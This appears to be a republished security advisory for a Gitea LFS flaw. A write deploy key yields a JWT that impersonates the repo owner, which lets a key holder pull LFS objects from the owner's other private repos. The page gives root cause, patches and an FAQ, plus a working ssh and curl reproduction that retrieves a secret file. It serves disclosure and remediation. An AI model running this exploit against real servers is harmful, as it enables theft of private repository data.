Summary
Gitea LFS Deploy-Key Privilege Escalation
Vulnerability Header
| Field | Value |
|---|---|
| Vulnerability Title | Gitea LFS Deploy-Key Privilege Escalation |
| Severity Rating | High |
| Bug Category | Insufficient Authorization |
| Location | services/lfs/server.go:268, routers/private/serv.go:275 |
| Affected Versions | 1.25.5 |
Executive Summary
Gitea's LFS server (services/lfs/server.go:268) uses the UserID embedded in an LFS JWT to make cross-repository authorization decisions via LFSObjectAccessible(). This would be safe if the JWT UserID always matched the actual requesting principal, but for deploy keys, routers/private/serv.go:275 sets UserID = repo.OwnerID instead of any identity representing the deploy key itself. As a result, an attacker who holds a write deploy key for any single repo owned by a victim can obtain a legitimate JWT (via the standard SSH git-lfs-authenticate flow) that Gitea will honor as if the victim themselves were making the request. The attacker can then exfiltrate LFS objects from any private repo the victim owns, no admin credentials, no server secrets, no brute force required. If the victim is a site administrator, every LFS object on the entire Gitea instance is reachable. Deploy keys exist precisely to grant narrow, single-repo access to CI/CD systems; this vulnerability defeats that isolation entirely for LFS data.
Root Cause Analysis
Technical Description
The vulnerability is a trust-boundary confusion across two independent subsystems. When a deploy key authenticates over SSH, serv.go sets UserID = repo.OwnerID because the code has no better representation for a deploy key identity (a FIXME comment acknowledges this). That UserID is baked verbatim into the LFS JWT by cmd/serv.go. The JWT is then consumed by server.go, which treats claims.UserID as the authenticated principal and loads that user object as ctx.Doer. When the batch upload handler encounters an object that exists on disk but isn't yet linked to the target repo, it calls LFSObjectAccessible(ctx, ctx.Doer, oid), a global query across all repos the claimed user can see, to decide whether to silently create the cross-repo link. The JWT's RepoID claim is verified (so the request is correctly scoped to one repo at the HTTP level), but the UserID driving the cross-repo access decision is the repo owner, not the deploy key. The attacker ends up holding a valid, server-signed token that impersonates the victim for any LFS authorization check.
First Faulty Condition
The primary bug, where the JWT UserID is set incorrectly, is in serv.go:
| File | routers/private/serv.go |
|---|---|
| Line | 275 |
| Condition | Deploy key branch sets results.UserID = repo.OwnerID; the owner's UID is embedded in the JWT and later used as the authenticated principal for cross-repo privilege decisions in server.go:268 |
// routers/private/serv.go:252–278
if key.Type == asymkey_model.KeyTypeDeploy {
...
// FIXME: Deploy keys aren't really the owner of the repo pushing changes
// however we don't have good way of representing deploy keys in hook.go
// so for now use the owner of the repository
results.UserName = results.OwnerName
results.UserID = repo.OwnerID // ← OWNER's UID, not the deploy key
...
}
The secondary bug, where the tainted UserID is actually misused, is in server.go:
| File | services/lfs/server.go |
|---|---|
| Line | 268 |
| Condition | LFSObjectAccessible(ctx, ctx.Doer, oid) makes a cross-repo decision using the JWT UserID, which for deploy keys is the repo owner, not the deploy key holder |
// services/lfs/server.go:267–275
if exists && meta == nil {
accessible, err := git_model.LFSObjectAccessible(ctx, ctx.Doer, p.Oid)
...
if accessible {
_, err := git_model.NewLFSMetaObject(ctx, repository.ID, p) // links OID to attacker's repo
...
}
}
Admin amplification: if victim.IsAdmin, models/git/lfs.go:226 short-circuits with a bare COUNT(*) over the entire lfs_meta_object table, no repo filter. A deploy key on any admin-owned repo reaches every LFS object on the instance.
Exploitability Assessment
Attack Vector & Reachability
| Attack vector | Network |
|---|---|
| Authentication required | Low: attacker must hold a write deploy key's private key material for any of victim's repositories |
| User interaction required | None |
| Reachable in default config | No. Requires LFS_START_SERVER = true |
| Entry point(s) | SSH git-lfs-authenticate command + HTTP LFS batch API |
The practical exploitability of this vulnerability is constrained by a second prerequisite that is independent of the authorization bypass itself: the attacker must know the SHA-256 OID of a specific LFS object in the target repository. OIDs are 256-bit digests, not enumerable and not brute-forceable, and the LFS batch endpoint functions only as an existence oracle, not a listing mechanism. Successful exploitation therefore requires a prior information-disclosure path that exposes OIDs outside the repository boundary. Known paths include public forks that retain stale LFS pointer files in git history, former collaborators who retained object references from a prior git pull, and issue or pull request comments that reference pointer file contents.
LFS pointer files are committed in plaintext to git history, so anyone who ever cloned or had read access to the target repo retains all OIDs permanently. The attack is effectively a post-revocation persistence primitive, after a collaborator loses access, they can continue downloading updated versions of LFS files they previously knew existed.
Reproduction Steps
Environment
The issue was reproduced using gitea/gitea:1.25.5 docker image.
Setup (performed as victim/admin, represents normal deployment state)
# 1. Victim creates a private repo and uploads an LFS object
git clone http://victim:PASSWORD@localhost:3000/victim/secret-repo.git
cd secret-repo
git lfs track "*.bin"
echo "TOP SECRET: password is hunter2" > secret.bin
git add .gitattributes secret.bin && git commit -m "secret"
git push && git lfs push origin main
# Note the OID and size from:
git lfs pointer --file=secret.bin
# oid sha256:1d4fed31944373fcc761b70a2efc4a9731bc3a007c63ecee22ccd5b93bb6483b
# size 32
# 2. Victim creates ci-repo and registers a write deploy key
# (via UI: ci-repo → Settings → Deploy Keys → Add Deploy Key → enable write access)
# Attacker holds the corresponding private key (e.g. leaked from CI config)
Exploit
# Step 1, Obtain JWT via SSH using only the deploy key (no victim credentials)
ssh -i ~/.ssh/deploy_key -p 2222 git@localhost \
"git-lfs-authenticate victim/ci-repo upload"
# → {"header":{"Authorization":"Bearer eyJ..."},"href":"..."}
# Decode payload: {"RepoID":3,"Op":"upload","UserID":4,...}
# ^^^^^^^^ victim's UID, BUG
JWT="eyJ..."
OID="1d4fed31944373fcc761b70a2efc4a9731bc3a007c63ecee22ccd5b93bb6483b"
SIZE=32
# Step 2, Confirm attacker is blocked from secret-repo directly
curl -s -H "Authorization: Bearer $JWT" \
"http://localhost:3000/victim/secret-repo.git/info/lfs/objects/$OID"
# → {"Message":"Unauthorized"} , correctly blocked
# Step 3, Batch upload to ci-repo claiming the secret OID
curl -s -X POST \
-H "Authorization: Bearer $JWT" \
-H "Accept: application/vnd.git-lfs+json" \
-H "Content-Type: application/vnd.git-lfs+json" \
"http://localhost:3000/victim/ci-repo.git/info/lfs/objects/batch" \
-d "{\"operation\":\"upload\",\"transfers\":[\"basic\"],\"objects\":[{\"oid\":\"$OID\",\"size\":$SIZE}]}"
# → {"objects":[{"oid":"1d4fed...","size":32}]} , NO "actions" field
# server silently linked the OID to ci-repo without demanding proof of possession
# Step 4, Download the secret via ci-repo
curl -s -H "Authorization: Bearer $JWT" \
"http://localhost:3000/victim/ci-repo.git/info/lfs/objects/$OID"
# → TOP SECRET: password is hunter2
Expected output
Step 2: {"Message":"Unauthorized"} ← blocked from secret-repo
Step 3: {"objects":[{"oid":"1d4fed...","size":32}]} ← no actions = silently linked
Step 4: TOP SECRET: password is hunter2 ← exfiltrated via ci-repo
PoC files
- poc.sh, end-to-end PoC using real SSH deploy key
Attribution
This vulnerability was discovered by Claude, Anthropic's AI assistant, and triaged by Adrian Denkiewicz at Doyensec in collaboration with Anthropic Research.
For CVE credits and public acknowledgments: Doyensec in collaboration with Claude and Anthropic Research.
Impact
CVE-2026-58435 has a CVSS score of 5.4 (Medium). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (1.27.0); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
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See it in your environmentNew to Kodem? Get a demo →Remediation advice
A proper fix might require significant architecture change. A short term recommendation is presented below:
Fix 1, services/lfs/server.go:267 (defense in depth, immediately effective)
Remove the LFSObjectAccessible cross-repo shortcut. Require proof of possession (the normal upload flow) for any object not already linked to the target repo. The JWT is correctly scoped to one RepoID; authorization decisions about other repos should not be made using the JWT UserID.
// BEFORE (vulnerable):
if exists && meta == nil {
accessible, err := git_model.LFSObjectAccessible(ctx, ctx.Doer, p.Oid)
if err != nil {
log.Error("Unable to check if LFS MetaObject [%s] is accessible: %v", p.Oid, err)
writeStatus(ctx, http.StatusInternalServerError)
return
}
if accessible {
_, err := git_model.NewLFSMetaObject(ctx, repository.ID, p)
if err != nil {
log.Error("Unable to create LFS MetaObject [%s] for %s/%s. Error: %v", p.Oid, rc.User, rc.Repo, err)
writeStatus(ctx, http.StatusInternalServerError)
return
}
} else {
exists = false
}
}
// After (safe):
if exists && meta == nil {
// Do not use ctx.Doer for cross-repo decisions, the JWT only authorizes
// access to this repo. Always require proof-of-possession for objects
// not already linked here.
exists = false
}
The client will re-upload the bytes (which are hash-verified).
Performance cost: one redundant upload per cross-repo object. Security gain: the cross-repo trust boundary is enforced regardless of how the JWT was issued.
Full patch: fix1.patch
Fix 2, routers/private/serv.go:275 (fix the source)
Stop embedding repo.OwnerID in the JWT for deploy keys. Options:
- Add a
DeployKeyIDfield to the JWTClaimsstruct; teachhandleLFSTokento construct a minimal synthetic principal with exactly the deploy key's permissions (single-repo, mode-limited). - Or mint a separate JWT type for deploy keys that
server.gotreats as repo-scoped only, refusing to use it for cross-repo operations.
Patch provenance: AI-generated + Human-reviewed
Frequently Asked Questions
- What is CVE-2026-58435? CVE-2026-58435 is a medium-severity security vulnerability in code.gitea.io/gitea (go), affecting versions < 1.27.0. It is fixed in 1.27.0.
- How severe is CVE-2026-58435? CVE-2026-58435 has a CVSS score of 5.4 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of code.gitea.io/gitea are affected by CVE-2026-58435? code.gitea.io/gitea (go) versions < 1.27.0 is affected.
- Is there a fix for CVE-2026-58435? Yes. CVE-2026-58435 is fixed in 1.27.0. Upgrade to this version or later.
- Is CVE-2026-58435 exploitable, and should I be worried? Whether CVE-2026-58435 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-58435 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-58435? Upgrade
code.gitea.io/giteato 1.27.0 or later.